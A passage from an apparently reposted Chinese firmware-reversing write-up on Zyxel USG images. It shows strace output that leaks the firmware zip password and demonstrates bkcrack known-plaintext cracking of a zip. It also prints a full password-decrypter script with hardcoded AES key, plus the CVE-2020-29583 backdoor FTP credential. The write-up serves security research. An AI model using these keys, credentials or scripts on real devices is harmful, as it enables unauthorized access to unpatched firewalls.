ch/21f5:1000","etc_writable/usb_modeswitch/21f5:3010","etc_writable/usb_modeswitch/2262:0001","etc_writable/usb_modeswitch/22de:6801","etc_writable/usb_modeswitch/22de:6803","etc_writable/usb_modeswitch/22f4:0021","etc_writable/usb_modeswitch/230d:0001","etc_writable/usb_modeswitch/230d:0003","etc_writable/usb_modeswitch/230d:0007","etc_writable/usb_modeswitch/230d:000b","etc_writable/usb_modeswitch/230d:000d","etc_writable/usb_modeswitch/230d:0101","etc_writable/usb_modeswitch/230d:0103","etc_writable/usb_modeswitch/2357:0200","etc_writable/usb_modeswitch/2357:f000","etc_writable/usb_modeswitch/23a2:1010","etc_writable/usb_modeswitch/257a:a000","etc_writable/usb_modeswitch/257a:b000","etc_writable/usb_modeswitch/257a:c000","etc_writable/usb_modeswitch/257a:d000","etc_writable/usb_modeswitch/8888:6500","etc_writable/usb_modeswitch/ed09:1021","etc_writable/wtpinfo","etc_writable/zyxel/","etc_writable/zyxel/conf/","etc_writable/zyxel/conf/__apcoverage_default.xml","etc_writable/zyxel/conf/__eps_checking_default.xml","etc_writable/zyxel/conf/__firewall_default.xml","etc_writable/zyxel/conf/__geoip_default.xml","etc_writable/zyxel/conf/__localwtp_default.xml","etc_writable/zyxel/conf/__route_default.xml","etc_writable/zyxel/conf/__system_default.xml","etc_writable/zyxel/conf/__system_default.xml-usg40","etc_writable/zyxel/conf/__system_default.xml-usg40w","etc_writable/zyxel/conf/__wantrunk_default.xml","etc_writable/zyxel/conf/__zwo.xml","etc_writable/zyxel/coredump_script/","etc_writable/zyxel/coredump_script/common.sh","etc_writable/zyxel/coredump_script/samples.sh","etc_writable/zyxel/coredump_script/sdwan_common.sh","etc_writable/zyxel/secuextender/","etc_writable/zyxel/secuextender/applet.html","etc_writable/zyxel/secuextender/sslapp.jar","etc_writable/zyxel/selector/","filechecksum","filelist","fwversion","wtpinfo",NULL})qemu: uncaught target signal 4 (Illegal instruction) - core dumped
- = 12766
- 12764 write(1,0x10127428,1). = 1
- 12764 open("/rw/compress.img",O_RDONLY) = -1 errno=2 (No such file or directory)
- 12764 fork() = 12770
- 12764 wait4(-1,1082108672,0,0,269668096,1) = 0
- 12770 execve("./unzip",{"./unzip","-o","-q","-P","vj/LOia3/vyoiX2No0MPojOrg0Pvf3OboPyC7YI9TGzCp1be3z3tiUkPWAKBFko","470AALA0C0.bin","-d","/","db/etc/zyxel/ftp/conf/","db/etc/zyxel/ftp/conf/system-default.conf",NULL})qemu: uncaught target signal 4 (Illegal instruction) - core dumped
- = 12770
- 12764 write(1,0x10127428,1). = 1
- 12764 open("//db/etc/zyxel/ftp/conf/system-default.conf",O_RDONLY) = -1 errno=2 (No such file or directory)
- 12764 write(1,0x10127428,2)
- = 2
- 12764 exit(-66)
- cyberangel@cyberangel:~/Desktop/Zyxel/firmware/_470AALA0C0.ri.extracted/_240.extracted/cpio-root/zyinit$
在上面的日志中注意到:
-P参数后紧跟的应该是压缩包的密码:vj/LOia3/vyoiX2No0MPojOrg0Pvf3OboPyC7YI9TGzCp1be3z3tiUkPWAKBFko,回到Windows试试:
好家伙,还真是,幸好之前在明文攻击的时候没有强制破解压缩包密码,这密码长的离谱!
<a name="RVPBq"></a> 补充当然了,明文攻击不仅包括攻击者知道加密压缩包中某一个被加密文件的所有内容,还包括部分已知的明文。比如: - 已知部分明文:*lag{16e3********************74f6********
- 待猜测的密文:flag{16e371fa-0555-47fc-b343-74f6754f6c01}
- 【这里的密文明文长度不一样】
我使用7-zip将密文压缩为加密压缩包flag.zip(7zip默认参数),密码为cyberangel。破解方式如下,我们需要将已知的明文切割为两个部分: - $ echo -n "lag{16e3" plain1.txt # 连续的明文
- $ echo -n "74f6" | xxd # 额外明文的十六进制格式,37346636
攻击:bkcrack -C flag.zip -c flag.txt -p plain1.txt -o 1 -x 29 37346636(得到密钥key):10d73eba 07e8a69e b69f719c【花了25分钟,垃圾Mac,风扇呼呼叫】
解包:bkcrack -C flag.zip -c flag.txt -k 10d73eba 07e8a69e b69f719c -d res.txt
>
- bkcrack -C 【加密压缩包】 -c 【加密压缩包的目标密文】 -p 【明文1】 -o 【明文1的起始位置在加密前文件中的偏移】 -x 【明文2的起始位置在加密前文件中的偏移】 【明文2 -- 16进制】
>
```bash
cyberangel@cyberangel:~/Desktop/Zyxel/test$ bkcrack -h
bkcrack 1.5.0 - 2022-07-07
usage: bkcrack [options]
Crack legacy zip encryption with Biham and Kocher’s known plaintext attack.
Options to get the internal password representation:
-c, —cipher-file <file Zip entry or file on disk containing ciphertext
—cipher-index <index Index of the zip entry containing ciphertext
-C, —cipher-zip <archive Zip archive containing the ciphertext entry -p, —plain-file <file Zip entry or file on disk containing plaintext
—plain-index <index Index of the zip entry containing plaintext
-P, —plain-zip <archive Zip archive containing the plaintext entry
-t, —truncate <size Maximum number of bytes of plaintext to load
-o, —offset <offset Known plaintext offset relative to ciphertext
without encryption header (may be negative)
-x, —extra <offset<dataAdditional plaintext in hexadecimal starting
at the given offset (may be negative)
—ignore-check-byte Do not automatically use ciphertext’s check byte
as known plaintext -e, —exhaustive Try all the keys remaining after Z reduction - --password <password Password from which to derive the internal password
- representation. Useful for testing purposes and
- advanced scenarios such as reverting the effect of
- the --change-password command.
Options to use the internal password representation:
-k, —keys <X<Y<Z Internal password representation as three 32-bits
integers in hexadecimal (requires -d, -U,
—change-keys or -r) -d, —decipher <file File to write the deciphered data (requires -c)
—keep-header Write the encryption header at the beginning of
deciphered data instead of discarding it -U, —change-password <archive<password>
Create a copy of the encrypted zip archive with the password set to the
given new password (requires -C) - --change-keys <archive<X<Y<Z>
- Create a copy of the encrypted zip archive using the given new internal
- password representation (requires -C)
-r, —recover-password <length<charset>
Try to recover the password or an equivalent one up to the given length
using characters in the given charset. The charset is a sequence of
characters or shortcuts for predefined charsets listed below.
Example: ?l?d-.@
?l lowercase letters
?u uppercase letters
?d decimal digits
?s punctuation
?a alpha-numerical characters (same as ?l?u?d)
?p printable characters (same as ?a?s)
?b all bytes (0x00 - 0xff) Other options:
-L, —list <archive List entries in a zip archive and exit
-h, —help Show this help and exit Environment variables:
OMP_NUM_THREADS Number of threads to use for parallel computations
cyberangel@cyberangel:~/Desktop/Zyxel/test$ - 注:已知的明文长度越长,破解速度越快
- 本篇文章使用的固件仍然存在`CVE-2020-29583`后门漏洞,admin用户加密之后的密文如下红框中所示`$4$WliGKvFQ$yMEH/WCnH1+NXuIUp0lzpUinIyEnrHFoRgesi6NdOFytmQg8lRfsVzUUjBGY+FiS4Up6KIgoP8OMEP0L3hRYSN2kpFTDIet31GoNwlM+S7U$`(`__system_default.xml-usg40`或`__system_default.xml-usg40w`):
- >
- 该加密方式使用了两种 -- base64编码和AES加密,国外已经有大师傅写出了相应的解密脚本:[https://github.com/inode-/zyxel_password_decrypter](https://github.com/inode-/zyxel_password_decrypter),我们可以将上面的那一串密文保存为txt文件,然后进行解密:
- 
- ```python
- '''
- /*****************************************************************************
- * Zyxel password decrypter *
- * *
- * Copyright (c) 2022, Agazzini Maurizio - maurizio.agazzini@hnsecurity.it *
- * All rights reserved. *
- * *
- * Redistribution and use in source and binary forms, with or without *
- * modification, are permitted provided that the following conditions *
- * are met: *
- * * Redistributions of source code must retain the above copyright *
- * notice, this list of conditions and the following disclaimer. *
- * * Redistributions in binary form must reproduce the above copyright *
- * notice, this list of conditions and the following disclaimer in *
- * the documentation and/or other materials provided with the *
- * distribution. *
- * * Neither the name of @ Mediaservice.net nor the names of its *
- * contributors may be used to endorse or promote products derived *
- * from this software without specific prior written permission. *
- * *
- * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS *
- * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT *
- * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR *
- * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT *
- * OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, *
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED *
- * TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR *
- * PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF *
- * LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING *
- * NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS *
- * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. *
- *****************************************************************************/
- '''
- from Crypto.Cipher import AES
- import base64
- import re
- import binascii
- import argparse
- aes_key = "001200054A1F23FB1F060A14CD0D018F5AC0001306F0121C"
- aes_iv = "0006001C01F01FC0FFFFFFFFFFFFFFFF"
- key = binascii.unhexlify(aes_key)
- iv = binascii.unhexlify(aes_iv)
- parser = argparse.ArgumentParser(description='Zyxel password decrypter')
- parser.add_argument('--in', dest='filename', help='configuration file', required=True)
- args = parser.parse_args()
- filein = args.filename
- fileout = args.filename + "_decrypted"
- print("Zyxel password decrypter\n")
- try:
- file1 = open(filein, 'r')
- except:
- print("[!] can't open " + args.filename)
- exit()
- all_lines = file1.readlines()
- try:
- file1 = open(fileout, 'w')
- except:
- print("[!] can't open for writing " + args.filename)
- exit()
- count = 0
- passwords = 0
- for line in all_lines:
- count += 1
- if "$4$" in line:
- pattern = "\$.*?\$(.*?)\$(.*?)\$"
- par = re.search(pattern, line)
- print("[ ] Decrypting " + str(par.group(0))[:20] + "...", end = '')
- cipher = AES.new(key, AES.MODE_CBC, iv)
- try:
- decrypted = cipher.decrypt(base64.b64decode(par.group(2)+'=='))
- except:
- print("\r[-] Decrypting " + str(par.group(0))[:20] + "... KO - Decryption failed")
- file1.writelines(line)
- continue
- if str(par.group(1)) in str(decrypted):
- clear_pass = decrypted.decode('utf-8')[len(str(par.group(1))):decrypted.decode('utf-8').find('\x00')]
- line = line.replace(par.group(0),clear_pass)
- print("\r[X] Decrypting " + str(par.group(0))[:20] + "... OK - (" + clear_pass + ")")
- passwords += 1
- else:
- print("\r[-] Decrypting " + str(par.group(0))[:20] + "... KO - Decryption failed")
- elif "$5$" in line:
- pattern = "\$.*?\$(.*?)\$(.*?)\$(.*?)\$"
- par = re.search(pattern, line)
- cipher = AES.new(key, AES.MODE_CBC, iv)
- print("[ ] Decrypting " + str(par.group(0))[:20] + "...", end = '')
- try:
- decrypted = cipher.decrypt(base64.b64decode(par.group(3)+'=='))
- except:
- print("\r[-] Decrypting " + str(par.group(0))[:20] + "... KO - Decryption failed")
- file1.writelines(line)
- continue
- if str(par.group(2)) in str(decrypted):
- decrypted = decrypted.decode('utf-8')[len(str(par.group(2))):decrypted.decode('utf-8').find('\x00')-1]
- cipher = AES.new(key, AES.MODE_CBC, iv)
- decrypted = cipher.decrypt(base64.b64decode(str(decrypted)+'=='))
- if str(par.group(1)) in str(decrypted):
- clear_pass = decrypted.decode('utf-8')[len(str(par.group(1))):decrypted.decode('utf-8').find('\x00')]
- line = line.replace(par.group(0),clear_pass)
- print("\r[X] Decrypting " + str(par.group(0))[:20] + "... OK - (" + clear_pass + ")")
- passwords += 1
- else:
- print("\r[-] Decrypting " + str(par.group(0))[:20] + "... KO - Decryption failed")
- else:
- print("\r[-] Decrypting " + str(par.group(0))[:20] + "... KO - Decryption failed")
- file1.writelines(line)
- file1.close()
- print("\nDecrypted " + str(passwords) + " passwords")
- print("Decrypted config file saved at " + fileout)
后门密码为1234,可以使用该密码登录ftp的21端口。具体的加密过程将会在下一篇文章中分析【因为我没学过AES加密,现学现卖,悲 】。
参考资料(PDF)(55条消息) 使用pkcrack明文方式破解zip压缩文件密码_张东南的博客-CSDN博客_pkcrack.pdf<br />用维阵还原 Zyxel 后门漏洞.pdf<br />USG310 4.70 固件解密分析 - CTF+.pdf<br />ZIP已知明文攻击深入利用 - FreeBuf网络安全行业门户.pdf【个人感觉对明文攻击总结的比较全面的文章】<br />Zyxel firmware extraction and password analysis - hn security.pdf
转自:iotsec-zone
|
|
